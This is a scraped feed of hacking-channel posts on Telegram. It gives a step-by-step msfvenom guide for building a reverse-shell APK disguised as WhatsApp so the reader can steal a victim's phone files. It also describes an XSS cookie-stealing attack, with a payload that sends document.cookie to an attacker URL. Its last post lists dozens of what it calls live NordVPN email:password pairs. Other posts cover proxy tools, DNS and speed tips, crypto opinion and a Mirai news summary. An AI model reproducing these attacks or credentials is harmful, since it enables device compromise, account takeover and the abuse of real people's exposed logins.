UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Androguard usage.pdf
161.6 KB
How to use Androguard- hack
full tutorial for beginers
#requested
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.

open terminal and type :
1️⃣Let's create a payload virus :

1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk

2) msfconsole

3) use exploit/multi/handler

4) set payload android/meterpreter/reverse
tcp

5) set lhost (YOUR IP)

6) exploit

7) cd /

8) ls -l

now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :

9) cd sdcard

10) ls -l

2️⃣ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.

1) cd WhatsApp

2) ls -l

3) cd Media

4) ls -l

After coming inside WhatsApp, you will have some such files open in front of you, where you have to

go to the media folder.

5) cd WhatsApp \ Images

6) ls -l

(Like I will go to the image folder and download an image and show you the commands you will find)

> example download (YOUR FILE NAME)

7) file has been downloaded, this file will

come in the root folder in your Linux.

ENJOY β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

πŸ¦‘FEATURES :

-Finds more than 7000 working proxies from ~50 sources.

-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).

-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.

-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.

-All proxies are checked to support Cookies and Referer (and POST requests if required).

Automatically removes duplicate proxies.

-Is asynchronous.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1
) To install last stable release from pypi:

$ pip install proxybroker

2) MANUAL INSTALL :

$ pip install -U git+https://github.com/constverum/ProxyBroker.git

3) Find and save to a file 10 US proxies (without a check):

$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt

4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:

$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WEBSITE HACKING METHODE
1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.


2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.

3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.

@UndercodeTesting
(source wiki)
enjoy
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
hack website methode
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SPEED UP DOWNLOAD SPEED


use the correct channel type for your router

Test a different modem/router. The biggest cause of slowed down

internet is a bad modem.

Scan for viruses.

Check for on-system interference.

Check your filters.

Try getting rid of your cordless phone

Plug in.

Check for external interference.

Check for Foxtel or other types of TV.

use interent download manager

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
24/24 posts enjoy & share us β€οΈπŸ‘πŸ»

T.me/UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Optimize your devices' DNS :-Speedup net speed :


I'm using Cloudflare as an example, but these techniques will work with any DNS provider.

1️⃣ROUTER
If you're using a router for your office network DNS settingsβ€”and you probably areβ€”log into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:

1) For IPv4: 1.1.1.1 and 1.0.0.1

2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.

πŸ…°οΈWINDOWS
With Windows 10:

1) Click on the Start menu.

2) Click on the Settings icon.

3) Click on Network & Internet.

4) Click on Change adapter options.

5) Double-click on the active network adapter.

6) Write down any existing DNS server entries for future reference.

7) Click Use The Following DNS Server Addresses.

8) Replace those addresses with the 1.1.1.1 DNS addresses:

> For IPv4: 1.1.1.1 and 1.0.0.1

> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

πŸ…±οΈWith Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:

1) Click on Network and Internet.

2) Click on Change Adapter Settings.

3) Right click on the Wi-Fi network you are connected to, then click Properties.

4) Select Internet Protocol Version 4 (or Version 6 if desired).

5) Click Properties.

6) Write down any existing DNS server entries for future reference.

7) Click Use The Following DNS Server Addresses.

8) Replace those addresses with the 1.1.1.1 DNS addresses:

> For IPv4: 1.1.1.1 and 1.0.0.1

> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

WELL DONE

E N J O Y β€οΈπŸ‘πŸ»
wiki source
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘As a smart contract platform, what are the advantages of BSV?

> Almost all DeFi projects are now on Ethereum. Will the future smart contract platform always be Ethereum?

> Objectively speaking, I think there is a 70% chance that it will still be Ethereum. The premise is that the development of Ethereum 2.0 is smooth. The existing moat of Ethereum is very high, but there are many shortcomings, so it is urgent to upgrade to 2.0 to change everything.

> I think the remaining probability can be given to BSV and DOT.

Needless to say, DOT is actually a faster-moving Ethereum 2.0, the ultimate sharding system, but compared to Ethereum, there are not so many developers and consensus, and it is difficult to replace it.

> If there is a small probability event, BSV is very likely. I am still very optimistic about the BSV smart contract platform.

> The advantage of BSV is that the contract only has operation instructions and results on the chain, and the process is calculated by itself, while Ethereum is the entire chain.

> BSV takes the route of on-demand verification. If you think the result of this contract is related to your interests, you can count it. You only need to compare the results to find out. Those who need it will follow the calculation. There is no need for the whole network to be brainless. Calculate together, this is more efficient.

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Mirai botnet exploits CVE-2020-5902 vulnerability to attack IoT devices
#News

> After the first disclosure of two F5 BIG-IP vulnerabilities in the first week of July , we continued to monitor and analyze these vulnerabilities and other related activities to further understand their severity. According to the workaround released for CVE-2020-5902 , we found an Internet of Things (IoT) Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI ), which can be added to new malware Scan in the variant to expose the Big-IP box.

> The samples discovered this time also attempt to exploit the newly disclosed unpatched vulnerabilities. It is recommended that system administrators and individuals using related equipment immediately patch their respective tools.

πŸ¦‘conventional
As previously reported , this security vulnerability involves a remote code execution (RCE) vulnerability in the BIG-IP management interface, namely the Traffic Management User Interface (TMUI). After analyzing the published information , we noticed from the Apache httpd mitigation rules that one way to exploit this vulnerability is to include an HTTP GET request containing a semicolon character in the URI. In the Linux command line, the semicolon sends a signal to the interpreter that the command line has been completed, which is a character that the vulnerability needs to trigger.

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST MAC-SPOOFER APPS FOR WINDOWS :

(remember mac spoofing in any linux & windows can be done without any extra software from settings-configuration let's share some windows apps for automate this small processπŸ˜‰)

1) https://technitium.com/tmac/

2) http://www.klcconsulting.net/smac/

3) http://www.softpedia.com/get/Network-Tools/Misc-Networking-Tools/Win7-MAC-Changer.shtml ( recommended for old windows )

4) http://www.softpedia.com/get/PORTABLE-SOFTWARE/Network/Portable-Spoof-Me-Now.shtml

5) https://madmacs.en.uptodown.com/

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NEW NORDVPN PREMIUMβœ…

Live gudrunbjork321@gmail.com:sims1997 Expry: 2021-11-11 01:01:39 19.07.2020 06:02:56
Live e_hollands@hotmail.com:Myrtle6740 Expry: 2021-11-10 02:20:19 19.07.2020 06:03:01
Live brianaustin2@gmail.com:W@K@d3k3 Expry: 2021-11-03 00:00:00 19.07.2020 06:04:25
Live rakiciva@msu.edu:Nino29Kica Expry: 2021-09-18 02:37:39 19.07.2020 06:06:46
Live selfbias@gmail.com:Paranoid1 Expry: 2021-09-17 21:12:29 19.07.2020 06:06:51
Live octaviojr619@msn.com:Octavio0! Expry: 2021-08-29 08:39:24 19.07.2020 06:07:24
Live shadowjohnson1985@gmail.com:sh4d0wm4n Expry: 2021-08-27 19:15:41 19.07.2020 06:08:41
Live stmurray5@gmail.com:Kicker15 Expry: 2021-08-26 22:35:15 19.07.2020 06:08:47
Live jjohnson031982@gmail.com:Drafting2! Expry: 2021-08-26 00:00:00 19.07.2020 06:09:27
Live dravenkish@gmail.com:Roo123dog Expry: 2021-08-25 23:35:13 19.07.2020 06:09:31
Live bazarjani.kian@gmail.com:Kiasadrifeb97 Expry: 2021-08-12 03:20:30 19.07.2020 06:09:39
Live cap_thecrazykid@yahoo.com:Shemale97 Expry: 2021-07-29 21:20:41 19.07.2020 06:11:20
Live adrian.richter1@gmx.de:kaktusse8 Expry: 2021-07-29 16:40:27 19.07.2020 06:11:24
Live ZINDEL.ADAM@GMAIL.COM:09Zman-46 Expry: 2021-07-23 21:57:05 19.07.2020 06:12:03
Live mrtoel@gmail.com:Trumpet1! Expry: 2021-07-09 08:38:43 19.07.2020 06:12:07
Live richardsonalex69@yahoo.com:july1973 Expry: 2020-07-16 14:46:07 19.07.2020 06:12:33
Live sandrosurbakti@gmail.com:sandro135 Expry: 2020-07-24 12:08:14 19.07.2020 06:12:37
Live bill.wheeler101@yahoo.com:Kisses69 Expry: 2021-07-06 19:43:08 19.07.2020 06:12:41
Live thephillipta@gmail.com:padamon00 Expry: 2021-07-04 15:44:37 19.07.2020 06:13:15
Live kennyroy02@aol.com:Knight02 Expry: 2021-07-03 22:42:39 19.07.2020 06:13:20
Live twingenicide@gmail.com:wallnut8545 Expry: 2021-06-28 17:23:37 19.07.2020 06:14:06
Live rossspearman68@gmail.com:Blue1216 Expry: 2021-06-25 23:53:14 19.07.2020 06:14:28
Live angel36s@swbell.net:IFi81u812 Expry: 2021-06-25 14:15:22 19.07.2020 06:14:31
Live robertban666@gmail.com:hastur11 Expry: 2021-06-25 12:18:00 19.07.2020 06:14:34
Live ryanragsdale2001@gmail.com:Ryry2001 Expry: 2021-06-24 13:59:35 19.07.2020 06:14:38
Live sbernard608@gmail.com:00bf35137cf4 Expry: 2021-06-24 05:09:41 19.07.2020 06:15:47
Live alexlockwood550@gmail.com:locky1997 Expry: 2021-06-18 02:43:12 19.07.2020 06:15:51
Live Thedrewster357@gmail.com:DrewHudson357 Expry: 2021-06-16 15:14:04 19.07.2020 06:15:55
Live let_your_soulfly@hotmail.com:Incubus311! Expry: 2021-06-15 10:27:24 19.07.2020 06:16:23
Live kernreeves1998@hotmail.com:TryhardTac0 Expry: 2021-06-14 03:42:50 19.07.2020 06:16:49
Live cmhazelton1998@gmail.com:agletzip1998 Expry: 2021-06-13 07:17:45 19.07.2020 06:16:52
Live matclaxton@hotmail.com:r44267171 Expry: 2021-06-10 11:25:23 19.07.2020 06:16:56


(only verified by us)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁